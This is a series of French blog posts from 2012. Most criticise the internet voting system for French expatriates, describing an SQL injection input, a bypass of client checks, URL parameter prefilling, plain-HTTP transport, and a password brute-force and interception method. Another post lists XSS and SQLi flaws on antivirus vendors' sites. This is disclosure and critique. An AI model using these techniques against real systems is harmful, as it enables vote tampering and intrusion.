La problématique soulevée est juste : il s’agit de permettre aux Français vivant à l’étranger de voter depuis chez-eux alors qu’autrement ils feraient face à des soucis techniques parfois lourds (plusieurs témoignages d’expatriés devant parcourir des centaines de kilomètres jusqu’à un consulat pour voter fleurissent sur la toile). La mise en pratique consiste à la sous-traitance d’une application de vote en ligne à une société (Scytl) dont on sait peu de choses mais dont il s’agit de la « spécialité ». Le tout est supervisé (à un niveau que l’on ignore) par le ministère des affaires étrangères.

L’ensemble des ressortissants Français inscrits sur les listes électorales et vivant à l’étranger a donc reçu un courrier à entête du ministère pour lui préciser la démarche et son identifiant de vote. Celui-ci est valable pour les deux tours des législatives et est couplé avec un mot de passe envoyé par un autre biais (par email ou sms en l’occurence, en fonction des témoignages toujours). Ce mot de passe lui changera pour le second tour.

Ce couple identifiant / mot de passe est ensuite à utiliser sur la fameuse application créée par Scytl et hébergée (visiblement) par le ministère sur ses serveurs. A la fin de chacun des scrutins le décompte est réalisé (visiblement là aussi) par Scytl et communiqué au ministère. Les votes effectués via internet sont comptabilisés au même titre que ceux effectués par courrier, dans les consulats ou par procuration en consulat.

D’un point de vue idéologique

Il y a donc beaucoup d’inconnues sur l’ensemble du procédé, une mise en place potentiellement compliquée pour les technophobes (à qui il reste les « anciens » moyens de voter) et d’ores et déjà une pléiade de témoignages de complications constatées par les citoyens usagers.

Mais pire encore, une entreprise privée, Scytl, se retrouve à être au cœur du système démocratique et devient toute puissante au regard des résultats sur son système de vote dont elle seule a le contrôle total.

Le vote est en effet effectué sur un système qui semble ne pas pouvoir garantir les conditions nécessaires au vote : au minimum sa confidentialité (rien ne nous permet d’attester que l’identifiant n’est pas directement attaché au vote et que Scytl, au moins, n’a pas accès aux informations) et sa transparence (présence d’une urne, vérification de la présence de son enveloppe à l’intérieur et possibilité d’assister au dépouillement) ou sa sécurité (on y revient juste après).

Le système en lui-même étant centralisé, il est très simple de le répliquer, d’en faire un fac similé et de mettre en place un site de phishing pour un budget moindre mais qui nous permettrait de mettre la main sur les identifiants et mot de passe de tous les votants inscrits. A ce sujet l’ami Ploum a écrit un magnifique tutoriel sur comment gagner un siège pour 12€.

En l’état nous avons donc un système completement opaque, simple à reproduire, et qui est contrôlé par une seule et unique entité : la société qui fournit le service.

D’un point de vue technique

Et c’est là que cela va bien vite se gater : la conclusion du paragraphe précédent pourrait laisser penser que tant que la société, dont il s’agit de la spécialité, sait faire son boulot il ne devrait pas y avoir de problème. Sauf que bien sûr, dans la réalité, ce n’est pas le cas : l’application présente de graves problèmes de sécurité qui ont été ignorés par le ministère (qui se targue d’avoir fait vérifier le code par l’ANSSI et des experts indépendants) et ces divers impairs laissent à penser qu’elle ne sait absolument pas ce qu’elle fait…

Un contexte douteux

J’avais hurlé il y a peu que le service d’aide présentait une vulnérabilité de type injection SQL ainsi qu’un problème d’exposition d’informations. Cela n’est probablement pas lié au système de vote de façon directe mais d’ores et déjà ça respire l’amateurisme. Les problèmes soulevés ici sont présents sur beaucoup de sites internet de particuliers ou de PME mais les trouver sur un site ayant ce type d’enjeux démocratique est plus qu’inquiétant.

L’application étant conçue en Java une série de vérifications est faite pour s’assurer que l’ordinateur de l’utilisateur utilise bien les bonnes versions de logiciel avant de lancer l’application en elle-même. De même il est vérifié (de façon très sommaire) si l’utilisateur n’essaye pas d’accéder au système via un terminal mobile dont la sécurité est assumée comme plus faible (le réseau 3G est potentiellement plus simple à sniffer). Ces vérifications sont en fait cosmétiques et il est possible d’accéder à l’application sans passer par ses vérifications dès lors que l’on connait le lien à utiliser… Il devient possible de voter depuis n’importe quel terminal, n’importe quel OS, n’importe quelle version de Java…

Une connexion non chiffrée

Non vérifié pour le moment mais il semblerait qu’il soit possible d’effectuer l’ensemble de la procédure de vote depuis une connexion non chiffrée (le petit cadenas dont on vous a appris de toujours vérifier la présence avant de payer en ligne est absent) ce qui veut dire que l’on peut potentiellement transmettre son vote via une connexion en clair, que la confidentialité du vote n’est plus garantie, mais qu’en plus le vote devient altérable pour peu qu’une autre personne que vous soit sur le même réseau et bien équipé…

Si le processus de vote présente encore des doutes sur ce point (bien que le code source semble prouver que c’est le cas), la partie du site servant à demander un nouveau mot de passe est-elle bien capable de fonctionner aussi bien en HTTP qu’en HTTPS.

Le mot de passe semble être récupérable

Le mot de passe entre dans la clef servant à chiffrer les échanges avec un certain nombre d’autres informations qui sont récupérables depuis le code source. Connaissant la forme du mot de passe : des lettres, minuscule, entre 6 et 10 il devient possible de bruteforcer le mot de passe en essayant de déchiffrer des informations qui auraient été échangées entre le système de vote (l’applet java) et le serveur de traitement.

Si le mot de passe est connu il devient possible de recréer la clef de chiffrement et donc de déchiffrer à la volée toutes les communications pour les lire ou les modifier (man in the middle).

Une attaque menée avec succès

Ce midi Laurent Grégoire nous a gratifié d‘un proof of concept permettant de voir comment un virus (par exemple) pourrait altérer le fonctionnement de l’applet de vote en forçant, quel que soit le choix du citoyen usager, le vote à l’un des candidats présents dans les choix proposés. L’ensemble de la méthode est décrite dans un document de 20 pages, code compris et ne nécessite pour fonctionner que de récupérer la liste des votants et de les infecter avec un virus spécialement crafté pour l’occasion.

La sécurité n’existe pas

D’autres problématiques techniques seront surement levées dans les prochains jours (je vous rappelle que ma boite mail comme les commentaires de ce blog ne logguent pas les IPs donc faite vous plaisir) mais la conclusion est déjà là : à tous les niveaux possibles cette application a été compromise et dans tous les cas il devient possible de compromettre au moins un des aspects essentiels du vote.

Quand bien même l’application en elle-même pouvait être sécurisée (ce qui est techniquement impossible), on ne serait pas à l’abri d’un site de phishing ou d’un virus sur l’ordinateur de l’électeur qui mettraient en péril l’intégrité du scrutin et poseraient systématiquement la question de sa légitimité.

Conclusion

Je n’ai volontairement pas développé sur le côté philosophique du vote par internet dans le cas où il viendrait à se généraliser. Mais il est clair qu’une solution comme celle-ci, permettant de se désintéresser un peu plus encore de la vie politique (je vote entre le petit dej et téléfoot) parait une très mauvaise idée.

En l’état la seule solution raisonnable semble d’annuler les quelques 45.000 votes déjà enregistrés et proposer aux votants de se replier sur les solutions historiques présentant un bien meilleur niveau de fiabilité. Dans le cas où ce ne serait fait, il s’agirait d’une magnifique mascarade élisant des députés selon un système qui a été prouvé bancal et dont on ne sait finalement pas s’il a réellement été abusé ou pas pour le moment, s’il le sera ou pas.

Sources, aller plus loin

flattr this!

]]>
Le vote électronique, suite technique…http://www.paulds.fr/?p=2291http://streisand.me.thican.net/paulds.fr/index.php?20120525_141740_Le_vote_electronique__suite_technique___Fri, 25 May 2012 12:17:40 +0000Il y a 15 jours je vous ai révélé la présence d‘une injection SQL sur le site de vote par internet destiné à élire les représentants des Français établis hors de France. Selon mes sources, aujourd’hui à 15h, se tient un plan média d’urgence au quai d’Orsay pour vanter les mérites de ce système… Ou pas ?

NB: cet article est très technique, faute de temps j’ai préféré livrer les conclusions sans les vulgariser. Je prendrai ce temps dans le week-end pour en faire une version plus… digeste…

J’ai regardé quelques peu le code java de l’applet servant à voter ainsi que l’environnement dans lequel il se trouve (le site en lui-même). De plus j’ai reçu deux emails de gentils anonymes (gentil.anonyme@yopmail.com et abc@abc.abc merci :) ) – voici quelques conclusions :

Sur l’environnement

Il est théoriquement impossible de passer l’étape de vérification de la configuration technique si vous avez fait le choix de travailler avec des logiciels open-source (donc pas Java lui-même mais un portage libre tout aussi sécurisé, si ce n’est plus). Théoriquement donc puisqu’il suffit de connaitre l’adresse de la page du vote pour bypasser cette sécurité (genre ici ;) ) et toutes les autres vérifications sur la configuration matérielle (vote depuis un smartphone inclu).

Si on se penche un peu plus en détail sur le code de ladite page on constate d’ailleurs qu’il est possible de pré-remplir certaines variables (réinjectées dans des champs ensuite) de l’applet lui-même depuis l’url de la page appelante (la vraie, passée en iframe pas celle que vous avez dans votre navigateur) :

https://scrutin.diplomatie.gouv.fr/portail/client_welcome.html?siteLanguage=&electionId=&electionEventId=&institutionId=&pin=&j_username=toto&password=

Cette possibilité s’étend aussi au mot de passe (pin ici) et à un mystérieux « password » que je n’ai pas réussi à faire réagir…

Sur le système de recouvrement de mot de passe il est possible assez simplement de provoquer des « internal error » sans que je ne sois trop sûr de savoir à quel point elles sont gérées ou pas et ce qu’elles provoquent comme dégats exacts dans les logs ou autres parties du système :

https://mdp-scrutin.diplomatie.gouv.fr/portail/defis.html?wicket:interface=:d:challengeForm::IFormSubmitListener::

Sur ces deux systèmes il est possible de passer par du https (connexion chiffrée) ou pas. Il est donc possible de voter en utilisant par exemple un wifi ouvert du burger king du coin (c’est pour les Français établis à l’étranger on a dit… chanceux !) et qu’un utilisateur du même réseau, malveillant celui-là, surveille ce qu’il se passe sur le réseau… en clair…

Sur l’applet lui-même

On constate assez vite que le code n’a pas été le moins du monde obfusqué, ce qui rend la décompilation des binaires java un jeu d’enfant… Auquel je me suis livré brièvement (découvrant des copyright 2004 à certains endroits, des codes qu’un stagiaire n’oserait pas pondre à d’autres, …) et auquel deux anonymes ont donné un peu plus de temps avant de me soumettre leurs trouvailles.

abc@abc.abc said :

Quelques commentaires sur l’applet de vote:
-le mot de passe est hashé avec du SHA256 et un salt hardcodé. Pas terrible, mais ça ne change rien, on est côté client. S’il y a du SSL, ça diminue le problème. (le code pourrait éventuellement supporter de l’authentification par certificat client dans des smartcards).

-le fichier ./com/scytl/pnyx/client/communication/ application/message/SecureMessageHelper.java contient un gros paquet de code chargé de l’envoi du vote (dénommé Ballot dans le code). Une clef AES est générée aléatoirement et utilisée pour chiffrer la structure de donnée envoyée. Cette clef est elle-même chiffrée avec une clef publique. J’ai l’impression que la clef publique est téléchargée à la volée. Les données peuvent donc être déchiffrées côté serveur. Impossible de savoir s’ils ont une gestion des clefs correcte.

-le vote envoyé a un identifiant, un « BallotId » généré aléatoirement. Ce n’est pas un GUID (identifiant unique), mais aléatoire. Il pourrait donc y avoir des
conflits, voire même l’écrasement d’un autre vote :D

-le vote contient le login (et le certificat de l’utilisateur si présent). La confidentialité du vote n’est donc pas assurée. De plus, rien n’empêche un administrateur de forger un vote. A tester: modifier l’applet pour qu’elle envoie le vote avec un autre username :D

En résumé, ça pourrait être presque sécurisé pour une application normale, mais c’est largement insuffisant pour du vote électronique. Les systèmes de vote électronique évolués utilisent généralement du chiffrement homomorphique, garantissent l’anonymat du vote et génèrent un résultat vérifiable par tous les
votants.

Un beau fail, quoi :)

gentil.anonyme@yopmail.com said (j’ai enlevé les bouts de code ici – parties marquées /* … */):

Analyse succinte de l’applet de vote electronique
————————————————-

1. Utilisation du protocole HTTP

La classe HTTPPostTransport.class (com.scytl.pnyx.client.communication.transport) contient une routine d’envoi d’information:

public String sendMessage(Map<String, String> paramMap, URL paramURL) throws TransportException
/* … */

Cette routine vérifie si le protocole de l’URL est HTTP ou HTTPS, et autorise l’envoi des données via la méthode POST. Le fichier de properties contient aussi un commentaire intéressant:

## The kind of transport. Currently only HTTP POST
pnyx.transport=HTTP

La classe HTTPPostTransport est utilisée par l’applet pour effectuer l’envoi des informations. Le choix d’HTTP et d’HTTPS se fait à partir de l’URL d’origine, un votant accédant via le protocole HTTP cause l’utilisation du protocole HTTP par l’applet. Ce point a déjà été identifié auparavant.

2. Implémentation cryptographique

Il y a des salts qui trainent dans le code de l’applet:

/* … */

Et en plus de cela, on retrouve une méthode de génération de hash de username:

/* … */

Grosso-modo, le nom d’utilisateur transmis est:

username_transformed = hexencode(hash(<hash(salt)><username><pin><hash(salt)>))

On a une routine similaire pour la génération du pin  »transformé »:

public synchronized String transformedPin(Map<String, String> paramMap)
/* … */

Cette fois-ci c’est le nom d’utilisateur qui sert de  »marqueur »:

pin_transformed = hash(<username_transformed><username><pin>)
pin_transformed2 = base64(hash(<username_transformed><username><pin><username_transformed>)
makeSecretKey(pin_transformed, pin_transformed2)

La routine de génération de clef est basée sur  le dernier hash calculé, généré à partir du nom d’utilisateur et du mot de passe, ainsi que le salt. Le salt est connu du client, donc peut être récupéré. Seul le mot de passe reste inconnu.

La clef ainsi générée sert à chiffrer l’ensemble des communications.

Si on couple ça au protocole HTTP, il est tout à fait possible d’intercepter une séquence d’authentification, et de bruteforcer le mot de passe (6
cars alpha minuscules).
De fait le secret du vote peut être compromis.

Je passe le fait que le salt n’est pas généré de manière aléatoire …

3. Conclusion rapide

Je n’ai pas pris le temps de regarder en détail l’intégralité du code, cette conclusion est donc quelque peu rapide et contient peut-être des erreurs, mais amha ces quelques éléments démontrent déjà que d’une part le démontre qu’il est possible d’intercepter les données du vote, et potentiellement de casser un mot de passe si on dispose de l’identifiant, et ainsi de pouvoir générer une clef permettant le déchiffrement des données. D’autre part, l’implémentation des routines crypto laisse entrevoir un possible amateurisme (il n’y a qu’à voir l’enchevetrement des appels aux fonctions de hachage imbriquées), mais cela reste à confirmer.

N’hésitez pas à contribuer ci-dessous (je désactive le log d’IP des commentaires le temps des législatives internet) ou via le formulaire de contact (même chose, il ne log pas les IP).

Vous pouvez aussi, si vous avez voté et avez rencontré des difficultés en témoigner sur le site dédié mis en place par le Parti Pirate.

Et pour vous renseigner sur le sujet : Hardkor ou Bastamag.

flattr this!

]]>
Le vote électronique n’est pas prêt, il est même vulnérable !http://www.paulds.fr/?p=2272http://streisand.me.thican.net/paulds.fr/index.php?20120510_095840_Le_vote_electronique_n___est_pas_pret__il_est_meme_vulnerable__Thu, 10 May 2012 07:58:40 +0000Régulièrement je demande à ce que l’outil numérique prenne une place plus importante dans le paysage politique. Et pourtant je milite contre le vote électronique, que ce soit dans les bureaux de vote ou à la maison comme vient de le proposer notre cher ministère des affaires étrangères. Il y a une raison à cette apparente schizophrénie : le réseau actuel n’est pas conçu pour cela et n’autoriserai que des dérives.

Hier j’ai lu que le vote par Internet allait devenir une réalité pour 2012, aux législatives et pour les Français de l’étranger. Et j’ai aussi lu quelque chose de très inquiétant : cette procédure ne sera encadrée que par une seule et unique personne.

Vous commencez à me connaitre, quand un nouveau site aussi important est lancé, je fais un petit tour dessus, surtout s’il est en .gouv.fr. Et là en particulier je tombe sur une vérification de la configuration. Il faut que je rétablisse les configurations diverses et variées de mon navigateur qui interdit le javascript, bloque un certain nombre d’informations et tente quelques petites manipulations sur les entêtes HTTP tout seul mais même après cela le site ne détecte pas mon applet Java (qui lui pour le coup est activé et fonctionnel, même si je ne m’en sers jamais).

On me propose un lien pour contacter une assistance… C’est vexant, mais certes. Et là un formulaire… Miam !

Mon navigateur, par habitude me propose bien vite la valeur « >d pour le premier champ, je tente, en re-désactivant javascript qui me gêne en vérifiant  tous les champs et en me disant de les remplir tous… Et là :

Non seulement le formulaire a été soumis alors que je n’ai rempli que le prénom (numéro de ticket support à la clef) – ce qui veut dire que l’ensemble des contrôles de sécurité de ce formulaire au moins sont effectués en javascript, côté client et donc désactivables – mais en plus de cela j’ai le droit à une information bonus en tête de ma page qui me semble fortement être une jolie injection dans les entêtes du mail… Dans un premier temps j’ai cru qu’il s’agissait du destinataire, mais après un second test ce sont mes informations qui sont apparues, celles de l’envoi précédent (2054-da Silva Paul–)… Mais alors là franchement, je ne vois même pas comment ça peut se retrouver là ! Une chose est sure : le « - - » à la fin ne me rassure pas, ce sont les commentaires en SQL, très utilisés pour les injections…

J’ai renvoyé le formulaire deux fois, javascript activé cette fois-ci et ai obtenu des résultats aléatoires… Alors j’ai essayé autre chose, toujours depuis ce formulaire de test et voilà l’écran sur lequel je suis tombé qui parle de lui même :

Non ça ne vous parle pas ? Bah c’est une injection SQL sur système Microsoft en espagnol avec affichage des erreurs (le tout hébergé dans un datacenter à Barcelone, on repassera pour le « achetez-français » ^^)… Pour les moins techniques d’entre vous cela signifie qu’au moins les tickets de support, si ce n’est l’ensemble du système de vote par ce site sont accessibles en lecture ou en écriture (en fonction du niveau de sévérité de la faille) à n’importe quelle personne ayant des compétences dans le domaine… La faille a été signalée, esperons qu’elle soit corrigée avant les législatives…

Alors que faire ? Et bien peut-être sortir des chemins battus, s’entourer de gens compétents lorsque l’on travaille sur des projets comme ceux-ci et envisager l’in-envisageable : pourquoi pas envisager le vote en P2P ?

flattr this!

]]>
On reparle de la négligence caractérisée maintenant ?http://www.paulds.fr/?p=2268http://streisand.me.thican.net/paulds.fr/index.php?20120508_160503_On_reparle_de_la_negligence_caracterisee_maintenant__Tue, 08 May 2012 14:05:03 +0000La position du nouveau président a été relativement floue quant à la question de la Hadopi lors de sa campagne. Aujourd’hui encore la seule référence relativement claire dont je dispose est un tweet de Fleur Pellerin qui dit vouloir abroger Hadopi pour la remplacer. Fair enough, mais attention à ce que vous garderez du dispositif et vers qui / quoi il s’orientera.

Je n’ai eu de cesse, comme beaucoup, de dénoncer le fameux délit de négligence caractérisée que notre loi fétiche a tous a mis en place en essayant d’expliquer en quoi il était déraisonnable de demander à tout un chacun d’assumer la responsabilité d’un acte technique lourd à infaisable : la sécurisation de sa connexion à internet. Pour rappel la connexion en question va du poste de l’utilisateur aux contenus qu’il visite et chaque maillon de cette chaine peut présenter une faille de sécurité plus ou moins lourde.

Intéressons nous à ce dernier maillon un instant…

Depuis quelques années maintenant je suis consultant à mon compte spécialisé en sécurité des applications Web. A ce titre j’ai audité des sites et applications pour des clients très divers allant d’institutions étatiques aux entreprises du CAC40 en passant par la petite PME qui vient de subir une attaque (tous sont protégés par les clauses de confidentialité signées, je ne donnerai donc pas de nom). Le point commun que j’ai trouvé à tous ces clients : il y avait toujours une faille (et souvent plus). Mais à la limite c’est normal, ce n’est pas leur boulot…

Alors ces deux derniers jours je me suis donné pour challenge de jouer avec des sites d’entreprises dont c’est justement le boulot : les éditeurs d’antivirus. Je n’ai pas joué non plus 200 ans et je n’avais pas accès aux sources des sites webs. Je me suis donc placé dans le rôle d’un attaquant pressé et ai essayé, armé d’un simple navigateur (firefox si vous voulez tout savoir) de dénicher des failles permettant par la suite de compromettre la sécurité de la connexion internet d’un utilisateur (au sens large prévu dans la loi) visitant les sites en question. Les deux seules réelles différences avec un attaquant mal intentionné ici sont que j’ai signalé les failles trouvées aux éditeurs correspondants et que je n’ai pas cherché à être anonyme.

Le résultat m’a surpris moi-même : sur les sites des principaux antivirus sur le marché seul celui de NOD32 (Eset) m’a résisté plus de 1h30, délai que je m’étais fixé (le temps c’est de l’argent ^^) et le lendemain de mes tests (annoncés sur twitter) j’ai eu la surprise de trouver un email m’indiquant une faille dans ma boite aux lettres (damn je l’ai laissée passer celle là !).

Au tableau de chasse sont donc tombés en deux jours, sur mon temps libre, des sites appartenant à :

- AVG (Injection SQL + XSS session stored dom based sur un site satellite)
- Kaspersky (XSS persistante sur un site satellite)
- Symantec (XSS dom based sur le site de paiement)
- Bitdefender (XSS persistante sur un site satellite couplé à du CSRF)
- McAffee (XSS persistante sur un site satellite)

A partir de ces failles j’aurai pu, en étant beaucoup moins bien intentionné que je ne le suis, compromettre les réseaux locaux des visiteurs des sites en question, les traquer, leur faire exécuter des actions contre leur gré vers des sites dont la consultation répétée est interdite, … Et la liste des possibles est longue… Le tout était présent sur des sites d’entreprises compétentes, fournissant de bons outils de sécurisation – imaginez ce qui traine sur les ordinateurs de la moitié des Français…

Alors monsieur le président, dans votre réflexion sur le remplacement de la Hadopi je vous prie de considérer ce qui suit : le seul intérêt de la négligence caractérisée est de permettre à l’état et à des entreprises privées d’avoir une excuse pour installer un logiciel espion sur les ordinateurs des français qui permettrait lors d’un jugement d’attester de la bonne volonté de la personne à avoir sécurisé son accès. Cette idée créée un précédent grave dans la mise sous surveillance de nos concitoyens et n’a pas de réalité technique tangible.

Il est impossible pour quiconque de sécuriser l’ensemble de sa connexion à Intenet car personne n’en maitrise tous les maillons. De plus demander à chaque français de se transformer en expert de la sécurité ne changerait rien puisque les experts eux-même ne peuvent penser à tout (et j’en sais quelque chose). Personne n’est infaillible et à moins de surveiller l’ensemble de la population à la Amesys il est impossible de prouver que la personne est de bonne foi par ce moyen là. Cherchez autre chose.

Ce billet est le premier d’une série qui sera adressée dans sa totalité aux nouveaux gouvernants de notre pays demandant la remise à plat de la quasi-totalité du règne Sarkozy sur l’Internet dans le but que la descente aux enfers cesse…

flattr this!

]]>
Je n’ai pas voté…http://www.paulds.fr/?p=2262http://streisand.me.thican.net/paulds.fr/index.php?20120507_100346_Je_n___ai_pas_vote___Mon, 07 May 2012 08:03:46 +0000Hier soir j’ai, comme beaucoup, célébré le départ de Nicolas Sarkozy. Je n’ai caché ni ma joie de voir partir Nicolas ni mon scepticisme de le voir remplacé par François. Très franchement je ne suis pas vraiment rassuré, mais au moins je suis heureux. Sauf que je n’ai pas participé à tout cela, et je tiens à vous expliquer, maintenant que l’enjeu est passé, mon choix.

Je ne voulais pas publier cet article avant que le vote soit passé par peur d’influencer quelques indécis qui auraient autrement voté et auraient pu regretter ce choix de dernière minute par la suite. Mais j’ai pris la décision il y a de cela quelques semaines / mois de ne pas voter lors de cette élection. Cette décision n’était pas motivée par la flemme ou pas le traditionnel tous pourri (ça c’est ce qui m’avait motivé à voter blanc ou nul aux précédentes échéances) mais par un réel ras-le-bol du système actuel et du peu qu’il a à proposer aux simples citoyens comme vous et moi (ce blog est toujours bloqué à l’assemblée nationale et dans d’autres instances).

J’ai refusé de participer à un évènement qui met le vote et la représentativité au centre de la vie politique à l’heure à laquelle les citoyens ont à disposition des moyens techniques qui leur permettent, théoriquement, d’influer de façon continue sur la vie politique. Cette possibilité nous est refusée par les mêmes instances que nous sommes censés approuver et légitimer par le vote. En somme en votant, avec tous les aléas que cela représente et sur lesquels je vais revenir, on accepte de fait que l’on va être trompés et déçus sans rien pouvoir y faire, mais en plus on donne à ces personnes tout notre pouvoir et notre validation.

Jusque là je votais blanc ou nul, par manque d’affinité avec les candidats et surtout leurs programmes (auxquels je savais par ailleurs qu’ils n’allaient pas se tenir). Cette fois-ci j’ai décidé de changer et d’assumer complètement les positions que je défends par rapport à la démocratie et son évolution souhaitable. Ce que j’ai constaté hier c’est la victoire d’un homme. Ni celle d’un parti, ni celle d’idées et à quiconque voudrait de me contredire je me permet de le / la renvoyer aux débats divers et variés qui ont ponctué cette campagne triste à mourir.

Ce n’est pas ce que je souhaite pour le pays des droits de l’Homme, ce n’est pas la division qui, pour moi, est la solution à une gouvernance éthique et pro-active pour que le niveau de vie et des libertés puissent progresser. C’est très loin d’un idéal que je persiste à vouloir poursuivre et qui nous permettrait à tous de décider, à la majorité, ce que l’on souhaite non pas pour nos dirigeants (je n’entre pas dans un clivage gauche-droite ici, je parle bien de la politique et pas des patrons) mais réellement pour nous, les citoyens.

Ce dont notre pays, notre monde, a besoin aujourd’hui c’est de personnes qui seraient prêts à tout remettre à plat, qui auraient les couilles de tout casser pour recommencer en tenant compte de la façon dont notre monde a évolué – en bien sur des aspects en pire sur d’autres – et de l’annoncer clairement, en dehors de tout intérêt personnel et dans un simple et unique but : l’intérêt souverain de la démocratie. Ces gens là seraient les artisans d’un prochain régime, les derniers dirigeants avant qu’enfin une utopie se réalise : celle de la démocratie, la vraie.

Enfin je vais me fendre d’un petit mot sur les sondages et les influences (la raison qui m’a fait choisir de ne publier cet article que maintenant) : en suivant tout ce tintamarre (je ne trouve pas d’autre mot) deux mois durant j’ai, plus que par le passé encore, eu l’amère impression que l’on nous volait cette maigre décision qui est censée être la nôtre. Les sondages, les couvertures médiatiques partielles et partiales et surtout l’endormissement des foules par la vente de temps de cerveau disponible et l’assèchement de la quantité déjà très faible de l’initiative politique pour les citoyens ne permettent ni de faire un choix éclairé, ni de juger par la suite de la pertinence de son choix.

Le vote est un droit, et surement pas un devoir, auquel j’ai décidé de renoncer. Et tous les gens qui seraient tentés de me conspuer en avançant que certains sont morts pour ce droit devraient revoir leurs classiques : ils y liraient que les martyrs dont on parle, récents ou moins, sont tombés pour la démocratie – une valeur pour laquelle je me suis battu moi aussi depuis des années et pour laquelle je continuerai à me battre jusqu’à ce que mort s’en suive. Je ne considère juste plus la représentativité par le vote comme le moyen optimal d’y parvenir dans la France, dans le monde, que nous connaissons aujourd’hui.

Je continuerai à discuter avec des élus ou des ministres chaque fois que j’en aurai l’occasion parce qu’ils sont à l’heure actuelle la seule forme législative que nous connaissons. Mais ce n’est pas là ce que je souhaite cautionner par un vote pour le pays que l’on m’a vendu quand j’étais gamin comme celui des droits de l’Homme.

flattr this!

]]>
Les lois interdisant la diffusion des résultats partiels sont une conneriehttp://www.paulds.fr/?p=2257http://streisand.me.thican.net/paulds.fr/index.php?20120422_121538_Les_lois_interdisant_la_diffusion_des_resultats_partiels_sont_une_connerieSun, 22 Apr 2012 10:15:38 +0000Mon chagrin du jour, mon coup de gueule de la semaine va à ces 10 pauvres fonctionnaires payés aujourd’hui à surveiller les interwebz pour éviter que l’on y retrouve des sacro-saints « résultats » avant l’heure fatidique ce soir… Challenge irréalisable et liberticide pour changer :)

La loi en question est le code électoral, article L52-2, et les sanctions sont prévues dans les articles L89 du même code et l’article 11 de la loi sur les sondages d’opinion. La première date de 1964, la seconde de 1977… accrochez vous les enfants, on fait un petit saut dans le futur, en 2012 !

Depuis hier donc, veille du premier tour de l’élection présidentielle, il nous est interdit de communiquer à propos des « résultats » avant 20h. Et quand je dis nous c’est les médias comme les particuliers. Tout ceci dans le but d’éviter d’influencer des votants…

Puis-je me permettre de rire ?

Avant-hier il était encore légal de publier un sondage, depuis hier on prend le risque d’influencer les votants… Wait what ?

Ces lois étaient peut-être intéressantes à l’époque de la télévision et de la radio (et encore) mais de nos jours comment espérer les voir respecter sans mettre le net sous surveillance ? Réponse courte : c’est impossible et c’est justement ce qu’ils ont décidé de faire. En ce jour hautement démocratique (en théorie mais j’y reviendrais) on met l’ensemble de la population sous surveillance pour vérifier si une loi de 1964 n’est pas violée ?

Sur la nature des sondages en elle-même je reviendrais plus longtemps dans un prochain article (après les élections) mais s’ils doivent être interdits sous prétexte qu’il y a un risque d’influence il faut le faire bien avant la veille. Parce que les sacro-saints « résultats » avec lesquels on nous bassine ne rien de plus ou de moins que ça : des sondages à la sortie des urnes !

Les vrais chiffres on les aura bien dans la soirée, mais d’ici là on a juste la même rengaine que depuis 3 mois… des sondages…

Pour finir, sachez que le Canada a prévu de travailler sur une réforme de cette loi… Nous on préfère surveiller le net :)

flattr this!

]]>
[Streisand] Logement à Puteaux : une résidence des étudiants pour quelques supers privilégiéshttp://www.paulds.fr/?p=2253http://streisand.me.thican.net/paulds.fr/index.php?20120415_150638__Streisand__Logement_a_Puteaux___une_residence_des_etudiants_pour_quelques_supers_privilegiesSun, 15 Apr 2012 13:06:38 +0000Suite à une décision de justice, Christophe Grebert qui avait dénoncé une affaire de curruption à Puteaux est contraint de supprimer son article sur le sujet. Dans un souci de liberté d’expression et de liberté d’informer l’effet Streisand s’est mis en route – Voici l’article en question ainsi qu’un lien vers l’article précisant l’état de l’affaire : ici.


J’ai visité hier, en compagnie de la conseillère municipale d’opposition Sylvie Cancelloni, la « résidence des étudiants et apprentis » de Puteaux, à l’angle des rues des Pavillons et Jean Jaurès. Il s’agit d’une résidence de luxe avec réception et gardien, 48 studios meublés et équipés pour des surfaces comprises entre 28 à 37 m2 (source : Site de la ville de Puteaux). Ces studios sont loués aux alentours de 300 euros par mois à des jeunes étudiants putéoliens visiblement très satisfaits des prestations offertes.

L’attribution de ces logements est l’exclusivité du maire Joëlle Ceccaldi-Raynaud. Seule condition : avoir le statut étudiant. Le revenu des parents n’est pas pris en compte.

J’ai constaté sur place que ces logements profitent (pas seulement, mais notamment) à des enfants d’élus UMP. La fille d’un maire-adjoint et haut fonctionnaire, logeant lui-même en HLM, y habite. On y trouve également des militants ou des enfants de militants et responsables de la section UMP de Puteaux.

Mais le plus surprenant dans cette « résidence des étudiants et apprentis » est que les 9e et 10e étages constituent un seul et même logement d’environ 150 m2 avec de grandes terrasses.

Ce duplex, qui profite d’une vue exceptionnelle sur le bois de Boulogne, la Seine et Paris, est loué aux alentours des 1.000 euros, soit le quart du prix du marché.

Cet appartement est actuellement occupé par la directrice de cabinet (un poste politique) du maire de Puteaux et par son époux. « Il ne s’agit pas d’un appartement de fonction. Mon mari et moi-même sommes titulaires d’un bail. Nous payons un loyer, soumis à l’augmentation annuelle, les charges, les taxes et les fluides. Il s’agit d’un appartement de 5 pièces, que nous occupons avec nos 4 enfants’« , m’écrit Marie-Aude BAILLY-LE BARS.

Madame Bailly-Le Bars tient par ailleurs à préciser la chose suivante : « Nous ne tolèrerons aucun propos ni aucune information déformée, mensongère ou calomnieuse ou attentatoire à notre vie privée. A défaut nous engagerions des poursuites immédiates contre son auteur ; nous adressons donc une copie de cette correspondance à notre conseil, Maître Philippe SARDA, avocat au barreau de Paris, qui est informé de votre demande et de cette réponse« .

Mais si justement ce logement n’est pas un appartement de fonction, il devrait être soumis au prix normal du marché. Or, ce n’est pas ici le cas. Par ailleurs, la menace de poursuites judiciaires et la transmission de ma demande écrite à un avocat sont une réaction exagérée par rapport à une situation normale.

Enfin, je précise que lors de notre visite de la résidence des étudiants, Sylvie Cancelloni et moi-même avons fait l’objet de menaces verbales et physiques du mari de Madame Bailly-Le Bars.

Sans aucune raison, celui-ci nous a violemment ordonné de quitter l’immeuble. Il m’a bousculé et pris mon téléphone avec lequel je tentais d’enregistrer ses menaces. Ma collègue élue a également été bousculée. Face à une personne qui nous paraissait dangereuse, le gardien de l’immeuble a – à notre demande – alerté la police nationale.
L’annonce de l’arrivée de la police a calmé notre agresseur : Il m’a rendu mon téléphone et est rentré chez lui, sans que nous ayons eu à quitter l’immeuble comme il nous l’ordonnait illégitimement.
Ce comportement est inacceptable, mais révélateur de l’ambiance délétère produite par l’actuelle majorité UMP de Puteaux.
Le cas échéant, je veux bien aller devant un tribunal pour témoigner de cela. Nous parlerons aussi liberté d’informer et prix du marché immobilier. Si j’ai des nouvelles de « Maître Philippe SARDA, avocat au barreau de Paris », je vous en informerai.
Christophe Grébert

flattr this!

]]>
